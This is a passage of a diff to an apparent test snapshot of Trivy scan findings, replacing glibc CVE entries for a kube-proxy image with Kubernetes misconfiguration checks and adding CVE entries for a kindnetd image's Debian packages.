"https://www.openwall.com/lists/oss-security/2022/03/28/1", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", }, { "type": "URL", @@ -156277,972 +156765,1293 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1751", - "installedVersion": "2.28-10", - "packageName": "libc6", + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1751", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", - "https://linux.oracle.com/cve/CVE-2020-1751.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200430-0002/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: array overflow in backtrace functions for powerpc", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1751", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1751", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1751", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-proxy' of DaemonSet 'kube-proxy' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1751", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1751.html", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(DaemonSet 'kube-proxy' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1751", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202006-04", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200430-0002/", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25423", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1751", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-1752", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2020-1752", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", - "https://linux.oracle.com/cve/CVE-2020-1752.html", - "https://linux.oracle.com/errata/ELSA-2020-4444.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", - "https://security.gentoo.org/glsa/202101-20", - "https://security.netapp.com/advisory/ntap-20200511-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", ], }, - "category": "Vulnerability", - "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: use-after-free in glob() function when expanding ~user", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-1752", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-1752", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1752", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV017", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv017", + ], + }, + "category": "Misconfiguration", + "description": "Privileged containers share namespaces with the host system and do not offer any security. They should be used exclusively for system containers that require high privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Change 'containers[].securityContext.privileged' to 'false'.", + "name": "Privileged container(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.privileged' to false)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-1752.html", + "value": "https://avd.aquasec.com/misconfig/ksv017", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4444.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1752", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsGroup' > 10000)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(DaemonSet 'kube-proxy' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200511-0005/", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-6096", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "apt", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-6096", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/attachment.cgi?id=12334", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", - "https://ubuntu.com/security/notices/USN-4954-1", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2020-6096", - "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-6096", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-6096", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.36.1-8+deb11u1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ { "type": "URL", - "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4954-1", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3326", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.32-4+b1", + "packageName": "coreutils", "references": [ - "http://www.openwall.com/lists/oss-security/2021/01/28/2", - "https://access.redhat.com/security/cve/CVE-2021-3326", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", - "https://linux.oracle.com/cve/CVE-2021-3326.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210304-0007/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", - "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3326", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3326", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", + }, + { + 